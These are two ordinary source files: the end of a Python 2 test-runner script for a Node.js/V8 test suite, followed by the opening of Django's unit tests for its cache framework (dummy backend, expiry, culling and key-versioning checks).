while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
self.parallel = self.case.parallel
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
help='write test output to file. NOTE: this only applies the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print "The run argument must be two comma-separated integers."
return False
else:
try:
options.run = map(int, options.run)
except ValueError:
print "Could not parse the integers from the run argument."
return False
if options.run[0] < 0 or options.run[1] < 0:
print "The run argument cannot have negative integers."
return False
if options.run[0] >= options.run[1]:
print "The test group to run (n) must be smaller than number of groups (m)."
return False
if options.J:
# inherit JOBS from environment if provided. some virtualised systems
# tends to exaggerate the number of available cpus/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in ["run", "skip", "dontcare"]:
print "Unknown flaky-tests mode %s" % options.flaky_tests
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = [
'sequential',
'parallel',
'pummel',
'message',
'internet',
'addons',
'gc',
'debugger',
'doctool',
'inspector',
]
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, mode='wb')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print "Can't find shell executable: '%s'" % vm
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
if archEngineContext.exit_code is not 0 or vmArch == "undefined":
print "Can't determine the arch of: '%s'" % vm
print archEngineContext.stderr.rstrip()
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = (
config.ClassifyTests(test_list, env))
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
try:
os.makedirs(tempdir)
os.environ['NODE_TEST_DIR'] = tempdir
except OSError as exception:
if exception.errno != errno.EEXIST:
print "Could not create the temporary directory", options.temp_dir
sys.exit(1)
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
if SKIP in case.outcomes or SLOW in case.outcomes:
return True
return FLAKY in case.outcomes and options.flaky_tests == SKIP
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if options.run is not None:
# Must ensure the list of tests is sorted before selecting, to avoid
# silent errors if this file is changed to list the tests in a way that
# can be different in different machines
cases_to_run.sort(key=lambda c: (c.case.arch, c.case.mode, c.case.file))
cases_to_run = [ cases_to_run[i] for i
in xrange(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import io
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, mock,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base.keys() if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
